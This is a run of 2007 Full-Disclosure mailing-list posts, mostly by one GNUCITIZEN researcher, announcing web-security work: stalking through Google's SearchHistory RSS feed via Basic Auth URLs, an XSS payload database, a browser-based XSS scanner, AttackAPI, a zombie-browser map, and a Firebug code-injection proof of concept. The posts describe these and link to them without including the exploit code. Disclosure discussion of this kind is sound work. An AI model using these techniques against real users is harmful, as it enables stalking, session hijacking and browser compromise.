Authentication. Now we all know how weak Basic Authentication is. By default, basic auth does not have any account lockout capabilities. Yes, this feature can be introduced and I haven't really tested it out on the Google's SearchHistory feed interface. Apart from that, the real danger is that if someone has your account details, they could potentially become your invisible stalker. Snoop onto Them as they Snoop onto us. In the digital age, compromising someones email just for the sake of it does not make sense. What is more interesting, is to learn as much as possible from the victim and use this knowledge for your own benefit. This is what attackers will be after. Relevant searches, places that you have been, stats, trends, secrets. If you have the Google Toolbar then you are even more screwed, since every step that you make will be recorded. Given the fact that everything is accessed via RSS, this information be easily analyzed, aggregated and even exported to the NET for everyone to see. As we all know Basic Auth credentials are part of the URL scheme, almost every RSS/ATOM aggregator supports them: http://username:[EMAIL PROTECTED]/history/?output=rss. What is even worse is that we can also perform queries on the history like this: https://www.google.com/searchhistory/find?q=[query]output=rss. Keep in mind that the SearchHistory is recording your moves no matter whether you want it or not. Your actions will be recorded for as long as you perform queries while being logged into Google or you have the Google Browser Toolbar installed. I am not saying that GOOGLE is bad. All I am saying is that someone can use this interface to harm others. It makes the process so much easier. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org Join us on IRC: irc.freenode.net #webappsec Have a question? Search The Web Security Mailing List Archives: http://www.webappsec.org/lists/websecurity/ Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS Feed] -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] digital stalking, Google SearchHistory RSS Interface
http://www.gnucitizen.org/blog/snoop-onto-them-as-they-snoop-onto-us This is not that of a news since the service is available since January this year, however I cannot see that many people discussing it. Anyway, Google allows consummation of SearchHistory profiles as simple RSS/ATOM feeds. IMHO, this will impact the security and privacy of the users (us) quite significantly. [...] The search history feed can be access from the following url: http://www.google.com/history/?output=rss. The interesting thing is that if your are not authenticated, the Google service will ask you to do so but though HTTP Basic Authentication. Now we all know how weak Basic Authentication is. By default, basic auth does not have any account lockout capabilities. Yes, this feature can be introduced and I haven't really tested it out on the Google's SearchHistory feed interface. Apart from that, the real danger is that if someone has your account details, they could potentially become your invisible stalker. Snoop onto Them as they Snoop onto us. In the digital age, compromising someones email just for the sake of it does not make sense. What is more interesting, is to learn as much as possible from the victim and use this knowledge for your own benefit. This is what attackers will be after. Relevant searches, places that you have been, stats, trends, secrets. If you have the Google Toolbar then you are even more screwed, since every step that you make will be recorded. Given the fact that everything is accessed via RSS, this information be easily analyzed, aggregated and even exported to the NET for everyone to see. As we all know Basic Auth credentials are part of the URL scheme, almost every RSS/ATOM aggregator supports them: http://username:[EMAIL PROTECTED]/history/?output=rss. What is even worse is that we can also perform queries on the history like this: https://www.google.com/searchhistory/find?q=[query]output=rss. Keep in mind that the SearchHistory is recording your moves no matter whether you want it or not. Your actions will be recorded for as long as you perform queries while being logged into Google or you have the Google Browser Toolbar installed. I am not saying that GOOGLE is bad. All I am saying is that someone can use this interface to harm others. It makes the process so much easier. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] new version of XSSDB
Hi there, GC has released a new version of XSSDB (http://www.gnucitizen.org/xssdb). The current version contains an XSS testing tool which is there to try each payload against the applications your are testing. You can submit XSS payloads. We are still in beta/alpha stage but gradually moving forward. Your feedback will be greatly appreciated. We are also working on a toolkit for Technika to automate some other tasks. thanks for the interest P.S. according to .mario, our leading database maintainer and founder of the PHPIDS group, there will be more then 50 new payload additions for the following couple of weeks. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] digital stalking, Google SearchHistory RSS Interface
comments inlined On 7/22/07, Greenarrow 1 [EMAIL PROTECTED] wrote: Well, for one, for security purposes why would anyone log into Google for search purposes. Second, most people I know who use any type of security people login to check their email, chat and play with the toys on their iGoogle. for most of the time, they are logged into Google. usually use a proxy if they are doing unknown type searches or surfing the web. This would place a kink in the ease of getting the info you stated in your email. :) keep in mind that most users are not tech/sec savvy While yes if anyone wanted to get your info that bad it would not matter what method one uses but I see the way you show as being the way a common Window home user would seek search data and I sure hope that corporate does not go this route. the point that I am try to make is that the attacker doesn't need to have access to your computer anymore. The data is available online 24/7. It is a lot easier to access Google Feed then some computer behind some obscured and poorly configured NATed network. Regards, George Greenarrow1 InNetInvestigations-Forensic Thanks George, cheers :) - Original Message - From: pdp (architect) [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk; OWASP Leaders [EMAIL PROTECTED]; WASC Forum [EMAIL PROTECTED] Sent: Saturday, July 21, 2007 2:04 AM Subject: [WEB SECURITY] digital stalking, Google SearchHistory RSS Interface http://www.gnucitizen.org/blog/snoop-onto-them-as-they-snoop-onto-us This is not that of a news since the service is available since January this year, however I cannot see that many people discussing it. Anyway, Google allows consummation of SearchHistory profiles as simple RSS/ATOM feeds. IMHO, this will impact the security and privacy of the users (us) quite significantly. [...] The search history feed can be access from the following url: http://www.google.com/history/?output=rss. The interesting thing is that if your are not authenticated, the Google service will ask you to do so but though HTTP Basic Authentication. Now we all know how weak Basic Authentication is. By default, basic auth does not have any account lockout capabilities. Yes, this feature can be introduced and I haven't really tested it out on the Google's SearchHistory feed interface. Apart from that, the real danger is that if someone has your account details, they could potentially become your invisible stalker. Snoop onto Them as they Snoop onto us. In the digital age, compromising someones email just for the sake of it does not make sense. What is more interesting, is to learn as much as possible from the victim and use this knowledge for your own benefit. This is what attackers will be after. Relevant searches, places that you have been, stats, trends, secrets. If you have the Google Toolbar then you are even more screwed, since every step that you make will be recorded. Given the fact that everything is accessed via RSS, this information be easily analyzed, aggregated and even exported to the NET for everyone to see. As we all know Basic Auth credentials are part of the URL scheme, almost every RSS/ATOM aggregator supports them: http://username:[EMAIL PROTECTED]/history/?output=rss. What is even worse is that we can also perform queries on the history like this: https://www.google.com/searchhistory/find?q=[query]output=rss. Keep in mind that the SearchHistory is recording your moves no matter whether you want it or not. Your actions will be recorded for as long as you perform queries while being logged into Google or you have the Google Browser Toolbar installed. I am not saying that GOOGLE is bad. All I am saying is that someone can use this interface to harm others. It makes the process so much easier. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org Join us on IRC: irc.freenode.net #webappsec Have a question? Search The Web Security Mailing List Archives: http://www.webappsec.org/lists/websecurity/ Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS Feed] -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Client-side JavaScript XSS Scanner - runs straight from your browser
http://www.gnucitizen.org/blog/javascript-xss-scanner This POC shows how easy is to implement XSS scanner by using only JavaScript and a few tricks from the Web2.0 world. Similar technique can be easily implemented into AJAX/XSS worms which will allow them to propagate across several domains and also find new vulnerabilities on their own. Don't be evil. Use the POC for educational and demonstration purposes only. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] JavaScript Spider - Yahoo Site Explorer Spider
http://www.gnucitizen.org/blog/yahoo-site-explorer-spider This simple POC uses Yahoo Site Explorer Service to craw/spider other webistes. It is written entirely with JavaScript - no server side support was required from my side. The POC proves once again that Web2.0 technologies open new ways of attacking Web infrastructures. Keep in mind that this spider is ultra fast. It does only several connects in order to obtain the entire directory structure of the targeted website. Also, keep in mind that it will take less then 5 minutes to make it equipped with the latest AJAX exploits. Therefore, I am not responsible for your actions. I am planning to write a follow up post on how we can make basic client-side XSS scanner on the top of this spider, so stay tuned. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The new dawn of filter evasion
http://www.gnucitizen.org/blog/the-new-dawn-of-filter-evasion .mario (http://www.gnucitizen.org/about/mario) has posted quite cool overview on filter evasion practices. Here is the excerpt : This article is about the most important phase when attacking a web application. The phase when the markup has just been broken and the attacker will try to inject his own markup, script code or other data - let's call it the PMBP (post-markup-breaking-phase). This phase is mostly possible to occur when quotes aren't correctly sanitized or when input is placed between two tags. In this article we will set the focus on the first variant - the attribute injection. And we will prove that protecting your markup from being broke is the very most important task in client side security. he goes further and dissects the process into the following sections: * Basic filtering * Get it running * Circumvent the ignorance * CSO's nightmare very interesting! -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] projections - another Web2.0/Security projection
http://www.gnucitizen.org/blog/projections This article is about the future developments in the Web world, emphasizing on the Web2.0 movement. I also cover that future holds for security experts that research into this area. I don't know, you might be interested. If you don't, trash the mail :) -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSSDB Elite (Web2.0 Engineering)
http://www.gnucitizen.org/blog/xssdb-elite http://www.gnucitizen.org/xssdb XSSDB is a advanced application that uses the latest Web2.0 Engineering practices in order to create a full features cross-site scripting database. I would like to call the new version of XSSDB: XSSDB Elite, since it is lighter, smaller, better, and a lot more featureful. XSSDB started as a simple interface to RSnake's Cross-site Scripting Cheat Sheet, which is still one of the most accurate resources for Cross-site Scripting attacks up to date. This status however, may change. Soon after I published the first version of XSSDB, I realized that we need to give the power back to the community in order to keep up with the latest Cross-site scripting attack vectors. At that time RSnake was the only one that was handling all changes for his cheat sheet and this is the reason why updates were coming rather slow. There were (there still are) tones of attack vectors that were not properly documented. The cheat sheet, although the best, was just not enough. How do you expect developers to come up with good enough anti-xss solutions when there is no single entry point to cover the vast topic of Cross-site scripting Attacks? There was a problem and no one was around to handle it. I was planning to integrate a simple database backend into XSSDB based on Wordpress. However, due to resource limitations, I had to leave the project for the latter. Meanwhile, another organization, XSSED.com took the initiative to collect various Cross-site scripting holes that are found within real websites. IMHO, the idea was interesting but not very well implemented. The purpose of XSSED.com should have been to protect the website owners by providing an early warning system. This is the reason why I targeted this website in particular in my research on hacking Web2.0 services/applications (Advanced Web Hacking Revealed), presented at OWASP, Italy 2007. During the conference, I discussed how attackers can use Dapper in combination with Yahoo Pipes to dynamically fetch entries from XSSED.com and exploit the affected sites. A XSS worm that implements similar functionalities has the potential to propagate across the entire Web. Obviously, this is quite dangerous. After OWASP, I promised to myself to come back and work on XSSDB to provide the best possible community driven XSS Database service. I was planning to use all my skills and knowledge in client side hacking to implement this system. The main goal was to keep the database decentralized so no one is in charge. This is how XSSDB Elite was born. The current version of XSSDB is entirely client-side based (i.e. it is a mashup). The database is handled by Zoho Creator and anyone who is willing to become maintainer/moderator is welcome to drop us an email. At the moment XSSDB allows you to add new XSS exploits and Site specific exploits. The GNUCITIZEN group is currently working on the warning system which will be implemented soon. The database is backed up on a regular basis by several aggregator which include: Securls.com, Google Reader and Feed Burner. We encourage users to subscribe to both XSSDB feeds so the community can recover if the database fail at some point in the future. So, this is it. XSSDB is one pretty good proof of concept that shows what can be achieved with minimal efforts and good understanding of Web2.0 engineering. Drop us an email or leave a comment on post, to tell us what do you think. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Attacking Password Recovery Facilities
http://www.gnucitizen.org/blog/attacking-password-recovery-facilities this is a small article from ap (aka pagvac) on how to attack password recovery facilities. this post just briefly scratches the surface and I am sure that he will come up with more stuff in the near future. Nevertheless, he brought some interesting points. Hava a look. Cheers. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The Top 5 most Popular Web2.0 Services Hackers Cannot live Without
http://www.gnucitizen.org/blog/the-top-5-most-popular-web20-services-hackers-cannot-live-without Let's have a look at the top 5 most popular Web2.0 services hackers cannot live without. This listing is based on my personal research that was also presented at OWASP Web Application Security Conference 2007 in Italy. The articles covers: Yahoo Pipes Dapper Feed43 Zoho Creator Google Reader enjoy -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Landing Securls.com
http://www.gnucitizen.org/blog/landing-securlscom In the last couple of months the GNUCITIZEN group has been secretively working on projects of various nature. We've jump started blogsecurity.net, the only organization that deals with web blog security exclusively, and we also introduced great improvements into the GNUCITIZEN Gadgets Interface, which rocks as you can see from its project page here (http://www.gnucitizen.org/projects/gadgets). Let's not forget about AttackAPIv3 (http://www.gnucitizen.org/projects/attackapi), which will be available for download as soon as we fix the documentation, and Hakiri (http://www.hakiri.com), which will make its way through as the first hacker lifestyle portal very soon. Today we are announcing a new project called SECURLS (http://www.securls.com) and we hope that you will find it as interesting and useful as we do. SECURLS is a place where you can get the latest headlines from the security industry social networks. The website will allow you to glance through the most important bits and pieces without the hustle to manage and organize the vast streams of information yourself. At the moment the website is relatively small, however further improvements are planned to be launched very soon, so please stay tuned. So far, you can get the latest entries from a list of websites we believe cover large enough user base. Of course we are open for any suggestions that you may have in mind. In the upcoming months, we are going to integrate context sensitive system which will allow you to filter the information that is most relevant to you. Among the planned improvements we have things such as the Google Hacking Database and XSSED.com integration, video casts, tutorials, presentations, etc. We are also going to improve the current feeds and launch SECURL version for mobiles. It is important to understand that SECURLS is not the traditional link directory most sites provide anyway. Behind the scenes we work with the latest Mashup technology to integrate information sources, perform contextual searches, filter relevant information and in general provide the best quality of service available today. We are proud of what we've got so far. SECURLS IS NOT A SPLOG. THE SITE RANKING WONT BENEFIT FROM THE GATHERED/COLLECTED CONTENT. So, this is it. If you find it interesting, please drop us an email. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] One Drop on A Spider Web
http://www.gnucitizen.org/blog/one-drop-on-a-spider-web just another way of doing XSS -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] A Brief History of MySpace
http://www.gnucitizen.org/blog/a-brief-history-of-myspace -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] About the power of Google
http://www.gnucitizen.org/blog/about-the-power-of-google Google has become the most profitable organization on the Web, having access to millions of people personal information, providing free services in exchange for even more data, dominating the web we know it today. It is time to question Google's dominant position on the global market, before it is too late. In the months to follow, I am going to present a serious of posts on how Google has transformed from the don't be evil search engine company to the true hacker platform. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Does what happens in the Facebook stay in the Facebook?
http://www.gnucitizen.org/blog/does-what-happens-in-the-facebook-stay-in-the-facebook Does what happens in the Facebook stay in the Facebook? is a quite clever video that shows some of the privacy issues that concern social networks today. I've talked about this topic in the Social Networks Mayhem article, which was published not that long time ago. The real question is: if Facebook has access to so much information, what hackers have access to? Hmmm… -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The Next Super JavaScript Malware - the web has crashed
The reason, attacker will go for XSSED.com instead of providing their own database is that XSSED has bigger audience and the chances for someone contributing a new vector are higher. Web2.0 is all about segmenting services in small independent but very useful blocks. So, why bother create a new database when you can use whatever is already available online. IMHO, malware code that makes use of various databases online can impact the Web to an extend beyond our imagination. For sure you can shut down the service at any given time but that won't make any difference at all. I use XSSED.com as an example, because it is the biggest database available today. If you shut down the service, it wont take long for attackers to find another database and reconfigure the infrastructure to support it as well. In fact, attackers can submit XSS vectors to Google Base. On 5/30/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Dear petko d. petkov, I don't know if it was your intention, but you're giving a bad name to xssed.com, which goal is to organize the public XSS vulnerabilities, make statistics, and first of all to spread education about XSS vulnerabilities. While the scenario you describe is somehow possible, it relies on the availability of our web site, and we'd be able to stop it quickly. Anybody would be able to build such list of XSS list without the need of our site, and with their own discoveries. I wanted to clarify it. Anyway i think that everybody here on the list knows the dangers and advantages of full disclosure.. Kevin http://www.gnucitizen.org/blog/the-next-super-worm In this article I explain a technique that can be used by malicious minds to build the next generation of JavaScript based malware. The post is for education purposes and I welcome everyone who has ideas how to stop these types of attacks to do so by sending an email or posting a comment. We do really need to start thinking about how to fight back and start developing strategies that can apply. cheers -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The Next Super JavaScript Malware - the web has crashed
http://www.gnucitizen.org/blog/the-next-super-worm In this article I explain a technique that can be used by malicious minds to build the next generation of JavaScript based malware. The post is for education purposes and I welcome everyone who has ideas how to stop these types of attacks to do so by sending an email or posting a comment. We do really need to start thinking about how to fight back and start developing strategies that can apply. cheers -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] GHDB - Google Hacking Database
http://www.gnucitizen.org/projects/ghdb http://www.gnucitizen.org/ GHDB (a.k.a. Google Hacking Database) is HTML/JavaScript wrapper application that uses advance JavaScript techniques to scrape information from Johnny's Google Hacking Database without the need for hosted server side scripts. In attempt to show the real dangers of AJAX APIs I've created completely harmless interface to Johnny's Google Hacking Database. Keep in mind that no service side scripts are required from my side. Also, keep in mind that all I am providing here is a single HTML page with a few JavaScript files to glue the interface together. The danger that I am trying to show here is that by mashing up a few services, attackers can create something which I would like to call a super worm. Super Worms, in terms of Web Application Security, are the successors of AJAX Worms! Original AJAX worms spread across a single domain, mimicking retro viral code: the worm does not leave the medium it infects. Super Worms can go further by exploiting other domains/mediums as well such as other websites, local and remote devices, etc. It took me 2 hours to put the application together. Most of the time I spent on the style sheets and the GUI. The core application functionalities were delivered within 5 minutes. Why this application is interesting you may ask? If I am not hosing any server side scripts on my side, and Johnny's johnny.ihackstuff.com does not provide any JSON export of the database either, how the heck I still manage to fetch the data? Well, I am using a screen scraper which is entirely based online. Online services are very Web2.0 so expect to see more of them very soon. For Web based malware, this means that they no longer need server side support. That is quite scary. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The Web has Betrayed Us
http://www.gnucitizen.org/blog/the-web-has-betrayed-us/ http://www.gnucitizen.org/ This is a short explanation of the Advanced Web Hacking talk for OWASP. The post outlines some of the important aspects that were covered. There is a lot more into it, but it is a good start I believe. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 2057 - The City
I stumbled across this documentary about cities of the future. For those who hasn't seen it yet, it is highly recommend. It will take only 43:29 minutes of your time. Believe me, it is worth looking at. It is quite exciting to look into stuff that may happen in the future. This documentary, in particular, is interesting because it depicts what will happen when our highly computerized world crashes and burns. Everything is so much dependent on IT security and I am not sure whether people realize it. So, I am not going to spam you more with this message. Those who are interested click here: http://www.gnucitizen.org/blog/2057-the-city -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Persistent CSRF and The Hotlink Hell
http://www.gnucitizen.org/blog/persistent-csrf-and-the-hotlink-hell/ http://michaeldaw.org/papers/hotlink_persistent_csrf/ I would like to bring your attention to a topic that has been rarely discussed. I am going to talk about hotlinks, redirections and of course CSRF (Cross-site Request Forgery). When we talk about CSRF we often assume that there is one kind only. After all, what else is in there when CSRF is all about making GET or POST requests on behalf of the victim? The victim needs to visit a page which launches the CSRF exploit. If the victim happens to have an established session with the exploited application, the attacker can perform the desired action like resetting the login credentials, for example. However, CSRF can be as persistent as persistent XSS (Cross-site Scripting) is and you don't need XSS to support it. Persistent CSRF is not dependent on persistent XSS. I hope that you find the post useful. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Application Layer Anti-virus/Firewall
http://www.gnucitizen.org/blog/application-layer-anti-virusfirewall I wrote a small article on application Layer Ant-virus/Firewall solution that I have in mind. I am not sure if that will be useful to anyone but it is still an interesting thing to think about. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox extensions go Evil - Critical Vulnerabilities in Firefox/Firebug
http://www.gnucitizen.org/blog/firebug-goes-evil There is critical vulnerability in Firefox/Firebug which allows attackers to inject code inside the browser chrome. This can lead to a lot of problems. Theoretically everything is possible, from modifying the user file system to launching processes, installing ROOTKITs, you name it. I recommend to disable Firebug for now until the issue is fixed. The issues is a bit critical since Firebug is one of the most popular extensions for Firefox. Given the fact that a lot of the Firefox users are geeks, the chances to have Firebug installed in a random Firefox client are quite high. I wrote two POC to demonstrate the issue. You can find them from the page on the top of this message. The first POC runs calc.exe and cmd.exe on windows systems. The second POC does a count down from 10 to 0 and executes calc.exe to prove that automatic execution is possible. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Preventing Cross-site Request Forgeries
http://www.gnucitizen.org/blog/preventing-csrf I briefly covered how simple it is to prevent CSRF attacks. Hope that you find it useful. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZombieMap - GEO Zombie Mapper
http://www.gnucitizen.org/projects/zombiemap http://www.gnucitizen.org/services/carnaval http://www.gnucitizen.org/projects/attackapi/ http://www.gnucitizen.org/projects/backframe/ ZombieMap is an AJAX application that you can use to locate Zombie hooked on bi-directional persistent communication channels. Carnaval is such type of channel and it is added by default. If you want to spawn your own attack channel, use AttackAPI's channel.php infrastructure module. These Zombie can be controlled with Backframe Attack Console If you cannot see points on the map in the first 5 seconds, most probably there are no attached clients. For testing purposes, open another browser (different from the one you use for ZombieMap) and point it to here. Have fun! -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Web Security and Bookmarklet Exploits
http://www.gnucitizen.org/blog/sex-candies-and-bookmarklet-exploits http://www.gnucitizen.org/projects/technika/ I have rolled out a new Technika browser extension. It is very small and extremely fast. Technika also integrates with Firebug, so you can easily test and compose Bookmarklets on the fly. The article that I pointed above discusses how Bookmarklets can be used to compose web app exploits. There is a framework similar to metasploit that will come out very soon. I thought that it might be a good idea to share these ideas now, so the community knows what to expect in the future. Thanks. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Phishing using IE7 local resource vulnerability
quite cool, good work On 3/14/07, avivra [EMAIL PROTECTED] wrote: Summary Internet Explorer 7.0 is vulnerable to cross-site scripting in one of its local resources. In combination with a design flaw in this specific local resource it is possible for an attacker to easily conduct phishing attacks against IE7 users. Affected versions . Windows Vista - Internet Explorer 7.0 . Windows XP - Internet Explorer 7.0 Workaround / Suggestion Until Microsoft fixes this vulnerability, do not trust the Navigation Canceled page! Technical Details and Proof-of-Concept Can be found here: http://aviv.raffon.net/2007/03/14/PhishingUsingIE7LocalResourceVulnerability .aspx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] new AttackAPI
for those who are interested in Web 2.0 security, there is a new version of AttackAPI that you can download from here: http://www.gnucitizen.org/projects/attackapi/ There is still no documentation which is a bit of a drawback, but that will be generated soon. If there is anyone interested in documenting some of the features, please contact us. There is a also a simple bookmarklet that you can use to load AttackAPI on any page. You can install it from here: http://www.gnucitizen.org/projects/load-attackapi-bookmarklet -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PDF Strikes Back
http://www.gnucitizen.org/projects/pdf-strikes-back/ Just recently I have been researching on PDF vulnerabilities again. I based my research on the work I did with David Kierznowski on PDF backdoors. My research does not show anything that is surprising but it outlines some important issues that should be kept in mind. cheers -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Stealing Browser History Without Using JavaScript
I've created a generic scanner based on this technique that everybody can use. It is located here: http://www.gnucitizen.org/projects/noscript-hscan/ RSnake, great job! On 2/28/07, RSnake [EMAIL PROTECTED] wrote: In case anyone is interested, I was able to port the old CSS history hacking stuff that Jeremiah Grossman originally found to a version that does not require JavaScript to fire using images and conditional logic built into CSS using a:visited and display attributes. It works in both IE7.0 and Firefox 2.0.0.2. Details at the link below: http://ha.ckers.org/blog/20070228/steal-browser-history-without-javascript/ -RSnake ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Advisory 03/2007: Multiple Browsers Cross Domain Charset Inheritance Vulnerability
indeed On 2/23/07, Michal Zalewski [EMAIL PROTECTED] wrote: On Fri, 23 Feb 2007, Stefan Esser wrote: Proof of Concept: The Hardened-PHP Project is not going to release a proof of concept exploit for this vulnerability. ...because pretty much no exploit is needed. Scary. Good catch. /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox Cache Hack - Firefox History Hack redux
http://www.gnucitizen.org/projects/hscan-redux/ Inspired by Michal Zalewski recent Firefox bug hunt, I decided to give it a go and see what I can come up with. We all know how vulnerable Firefox and other browsers are. This is the reason why I am not particularly interested in finding specific browser bugs. However, when you are in hackmode things like this don't really matter. This vulnerability is not a reworked version of Jeremiah Grossman history hack. It is completely different and it should be treated as a new issue. The peculiar thing about this vulnerability is that it tells you which URLs you have attended during the current browser session (the last time you opened your browser). I am not sure how useful this is. Keep in mind that attackers can abuse this vulnerability in order to extract valuable information about your browsing habits. They can also use this hack to precisely detect whether you are logged into your router management interface. They can use this hack to detect your router type and version as well. Based on this information, they might be able to compromise the integrity of your network. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox Cache Hack - Firefox History Hack redux
